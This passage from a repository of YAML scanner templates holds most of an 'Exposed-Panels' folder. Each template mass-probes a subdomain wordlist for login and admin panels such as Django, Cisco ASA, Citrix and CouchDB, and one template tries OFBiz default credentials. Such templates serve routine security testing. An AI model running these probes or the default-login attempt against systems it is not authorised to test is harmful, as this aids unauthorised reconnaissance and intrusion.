14 |
15 | raw:
16 | - |
17 | POST /control/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | Content-Type: application/x-www-form-urlencoded
20 |
21 | USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
22 | matchers-condition: and
23 | matchers:
24 | - type: word
25 | words:
26 | - "ofbiz-pagination-template"
27 | - "<span>Powered by OFBiz</span>"
28 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/active-admin-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: active-admin-exposure
2 |
3 | info:
4 | name: ActiveAdmin Admin Dasboard Exposure
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "active_admin_content"
23 | - "active_admin-"
24 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/activemq-panel.yaml:
--------------------------------------------------------------------------------
1 | id: activemq-panel
2 |
3 | info:
4 | name: Apache ActiveMQ Exposure
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - '<h2>Welcome to the Apache ActiveMQ!</h2>'
23 | - '<title>Apache ActiveMQ'
24 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/adobe-component-login-1.yaml:
--------------------------------------------------------------------------------
1 | id: adobe-component-login 1
2 |
3 | info:
4 | name: Adobe Component Brower Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6846
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /cfide/componentutils/login.cfm HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Component Browser Login'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/adobe-component-login-2.yaml:
--------------------------------------------------------------------------------
1 | id: adobe-component-login 2
2 |
3 | info:
4 | name: Adobe Component Brower Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6846
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /CFIDE/componentutils/login.cfm HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Component Browser Login'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/adobe-connect-central-login.yaml:
--------------------------------------------------------------------------------
1 | id: adobe-connect-central-login
2 |
3 | info:
4 | name: Adobe Connect Central Login
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: adobe,panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /system/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - 'Adobe Connect Central Login'
24 | part: body
25 |
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/adobe-experience-manager-login.yaml:
--------------------------------------------------------------------------------
1 | id: adobe-experience-manager-login
2 |
3 | info:
4 | name: Adobe-Experience-Manager
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22
8 | tags: panel,aem
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /libs/granite/core/content/login.html HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'AEM Sign In'
25 |
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/adobe-media-server.yaml:
--------------------------------------------------------------------------------
1 | id: adobe-media-server
2 |
3 | info:
4 | name: Adobe Media Server
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
8 | tags: panel,adobe
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Adobe Media Server'
25 |
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/advance-setup.yaml:
--------------------------------------------------------------------------------
1 | id: advance-setup-login
2 |
3 | info:
4 | name: Advance Setup Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6819
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Advanced Setup - Security - Admin User Name & Password'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/aims-password-mgmt-client.yaml:
--------------------------------------------------------------------------------
1 | id: aims-password-mgmt-client
2 |
3 | info:
4 | name: Aims Password Management Client Detect
5 | author: iamthefrogy
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /aims/ps/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "Avatier Corporation"
23 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/aims-password-portal.yaml:
--------------------------------------------------------------------------------
1 | id: aims-password-portal
2 |
3 | info:
4 | name: AIMS Password Management Portal
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6576
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /aims/ps/default.aspx HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Password Management Client'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/airflow-panel.yaml:
--------------------------------------------------------------------------------
1 | id: airflow-panel
2 |
3 | info:
4 | name: Airflow Admin login
5 | author: pdteam
6 | severity: info
7 | tags: panel,apache,airflow
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/airflow/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 |
22 | - type: word
23 | part: body
24 | words:
25 | - "Airflow - Login"
26 |
27 | - type: status
28 | status:
29 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/akamai-cloudtest.yaml:
--------------------------------------------------------------------------------
1 | id: akamai-cloudtest
2 |
3 | info:
4 | name: Akamai CloudTest Panel
5 | author: emadshanab
6 | severity: info
7 | tags: panel,akamai
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /concerto/Login?goto=Central HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - "Akamai Inc. All rights reserved"
24 | - "Akamai CloudTest"
25 | condition: and
26 |
27 | - type: status
28 | status:
29 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/ambari-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: ambari-exposure
2 |
3 | info:
4 | name: Apache Ambari Exposure / Unauthenticated Access
5 | author: pdteam
6 | severity: medium
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - 'Ambari'
23 | - 'href="http://www.apache.org/licenses/LICENSE-2.0"'
24 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/ansible-tower-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: ansible-tower-exposure
2 |
3 | info:
4 | name: Ansible Tower Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "Ansible Tower"
23 | - "ansible-main-menu"
24 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/apiman-panel.yaml:
--------------------------------------------------------------------------------
1 | id: apiman-panel
2 |
3 | info:
4 | name: Apiman Instance Detection Template
5 | author: righettod
6 | severity: info
7 | description: Try to detect the presence of a Apiman instance via the login redirection
8 | tags: panel,apiman
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /apimanui/api-manager HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - "/auth/realms/apiman"
25 | part: header
26 |
27 | - type: status
28 | status:
29 | - 302
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/atlassian-crowd-panel.yaml:
--------------------------------------------------------------------------------
1 | id: atlassian-crowd-panel
2 |
3 | info:
4 | name: Atlassian Crowd panel detect
5 | author: organiccrap
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /crowd/console/login.action HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - Atlassian Crowd - Login
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/bazarr-login.yaml:
--------------------------------------------------------------------------------
1 | id: bazarr-login-detect
2 |
3 | info:
4 | name: Bazarr Login Detect
5 | author: r3dg33k
6 | severity: info
7 | reference: https://www.bazarr.media/
8 | tags: panel,bazarr,login
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login HTTP/1.1
19 | Host: {{Subdomains}}
20 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
21 | Accept-Encoding: gzip, deflate
22 | Accept: */*
23 | matchers:
24 | - type: word
25 | words:
26 | - 'Bazarr'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/bitrix-panel.yaml:
--------------------------------------------------------------------------------
1 | id: bitrix-login
2 |
3 | info:
4 | name: Bitrix Login Panel
5 | author: juicypotato1
6 | severity: info
7 | tags: panel,bitrix
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /bitrix/admin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - "USER_LOGIN"
24 | - "/bitrix/js/main/"
25 | part: body
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
31 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/blue-iris-login.yaml:
--------------------------------------------------------------------------------
1 | id: blue-iris-login
2 |
3 | info:
4 | name: Blue Iris Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6814
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login.htm HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Blue Iris Login'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/calendarix-panel-1.yaml:
--------------------------------------------------------------------------------
1 | id: calendarix-panel 1
2 |
3 | info:
4 | name: Calendarix login detect
5 | author: r3dg33k
6 | severity: info
7 | tags: panel,calendarix
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /calendarix/admin/cal_login.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: word
25 | words:
26 | - 'Calendarix Admin Login'
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/calendarix-panel-2.yaml:
--------------------------------------------------------------------------------
1 | id: calendarix-panel 2
2 |
3 | info:
4 | name: Calendarix login detect
5 | author: r3dg33k
6 | severity: info
7 | tags: panel,calendarix
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /calendar/admin/cal_login.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: word
25 | words:
26 | - 'Calendarix Admin Login'
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/call-break-cms.yaml:
--------------------------------------------------------------------------------
1 | id: call-break-cms
2 |
3 | info:
4 | name: Call Break CMS
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - 'Call Break CMS'
23 | condition: and
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/checkmarx-panel.yaml:
--------------------------------------------------------------------------------
1 | id: checkmarx-panel-detect
2 |
3 | info:
4 | name: Checkmarx WebClient detector
5 | author: joanbono
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /cxwebclient/Login.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
23 | part: body
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cisco-asa-panel.yaml:
--------------------------------------------------------------------------------
1 | id: cisco-asa-panel-detect
2 |
3 | info:
4 | name: Cisco ASA VPN panel detect
5 | author: organiccrap
6 | severity: info
7 | tags: cisco,panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /+CSCOE+/logon.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "SSL VPN Service"
23 | part: body
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cisco-finesse-login.yaml:
--------------------------------------------------------------------------------
1 | id: cisco-finesse-login
2 |
3 | info:
4 | name: Cisco Finesse Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6824
8 | tags: panel,cisco
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Sign in to Cisco Finesse'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cisco-integrated-login.yaml:
--------------------------------------------------------------------------------
1 | id: cisco-integrated-login
2 |
3 | info:
4 | name: Cisco Integrated Management Controller Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/3859
8 | tags: panel,cisco
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login.html HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Cisco Integrated Management Controller Login'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cisco-sd-wan.yaml:
--------------------------------------------------------------------------------
1 | id: cisco-sd-wan
2 |
3 | info:
4 | name: Cisco SD-WAN panel
5 | author: z3bd
6 | severity: info
7 | reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj
8 | tags: panel,cisco
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 |
23 | - type: status
24 | status:
25 | - 200
26 |
27 | - type: word
28 | words:
29 | - "SD-Wan Center"
30 | part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cisco-secure-desktop.yaml:
--------------------------------------------------------------------------------
1 | id: cisco-secure-desktop
2 |
3 | info:
4 | name: Cisco Secure Desktop
5 | author: pdteam
6 | severity: info
7 | tags: cisco,panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /CACHE/sdesktop/install/start.htm HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - "Installation"
24 | - "WebLaunch"
25 | part: body
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
31 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/citrix-adc-gateway-detect-1.yaml:
--------------------------------------------------------------------------------
1 | id: citrix-adc-gateway-panel 1
2 |
3 | info:
4 | name: Citrix ADC Gateway detect
5 | author: organiccrap
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /logon/LogonPoint/index.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - _ctxstxt_CitrixCopyright
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/citrix-adc-gateway-detect-2.yaml:
--------------------------------------------------------------------------------
1 | id: citrix-adc-gateway-panel 2
2 |
3 | info:
4 | name: Citrix ADC Gateway detect
5 | author: organiccrap
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /logon/LogonPoint/custom.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - _ctxstxt_CitrixCopyright
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/citrix-vpn-detect.yaml:
--------------------------------------------------------------------------------
1 | id: citrix-vpn-detect
2 |
3 | info:
4 | name: Citrix VPN Detection
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /vpn/index.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Citrix Gateway"
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/clave-login-panel.yaml:
--------------------------------------------------------------------------------
1 | id: clave-login-panel
2 |
3 | info:
4 | name: Clave login panel
5 | author: __Fazal
6 | severity: info
7 | tags: panel,clave
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: status
23 | status:
24 | - 200
25 |
26 | - type: word
27 | words:
28 | - "Clave"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/compal-panel.yaml:
--------------------------------------------------------------------------------
1 | id: compal-panel-detect
2 |
3 | info:
4 | name: Compal CH7465LG panel detect
5 | author: fabaff
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /common_page/login.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - ""
24 | part: body
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/couchdb-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: couchdb-exposure
2 | info:
3 | name: couchdb exposure
4 | author: organiccrap
5 | severity: low
6 | tags: panel
7 |
8 | requests:
9 | - payloads:
10 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
11 | attack: sniper
12 | threads: 100
13 |
14 | raw:
15 | - |
16 | GET /_all_dbs HTTP/1.1
17 | Host: {{Subdomains}}
18 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - CouchDB/
24 | - Erlang OTP/
25 | part: header
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
31 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/couchdb-fauxton.yaml:
--------------------------------------------------------------------------------
1 | id: couchdb-fauxton
2 |
3 | info:
4 | name: Apache CouchDB Fauxton Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - 'Project Fauxton'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/crxde-lite.yaml:
--------------------------------------------------------------------------------
1 | id: crxde-lite
2 |
3 | info:
4 | name: CRXDE Lite
5 | author: nadino
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /crx/de/index.jsp HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "CRXDE Lite"
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cx-cloud-login-1.yaml:
--------------------------------------------------------------------------------
1 | id: cx-cloud-login 1
2 |
3 | info:
4 | name: CX Cloud
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "CX Cloud"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cx-cloud-login-2.yaml:
--------------------------------------------------------------------------------
1 | id: cx-cloud-login 2
2 |
3 | info:
4 | name: CX Cloud
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /cxcum/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "CX Cloud"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/django-admin-panel.yaml:
--------------------------------------------------------------------------------
1 | id: django-admin-panel
2 |
3 | info:
4 | name: Python Django Admin Panel
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/login/?next=/admin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - "Django administration"
24 | condition: and
25 | part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/dotcms-admin-panel.yaml:
--------------------------------------------------------------------------------
1 | id: dotcms-admin-panel
2 |
3 | info:
4 | name: dotAdmin Panel
5 | author: impramodsargar
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /dotAdmin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'dotCMS Content Management Platform'
25 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/druid-console-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: druid-console-exposure
2 |
3 | info:
4 | name: Alibaba Druid Console Exposure
5 | author: pdteam
6 | severity: medium
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - 'src="/druid.js"'
24 | - 'href="/druid.css"'
25 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/ems-login-panel.yaml:
--------------------------------------------------------------------------------
1 | id: ems-login-panel
2 |
3 | info:
4 | name: EMS Login page detection
5 | author: __Fazal
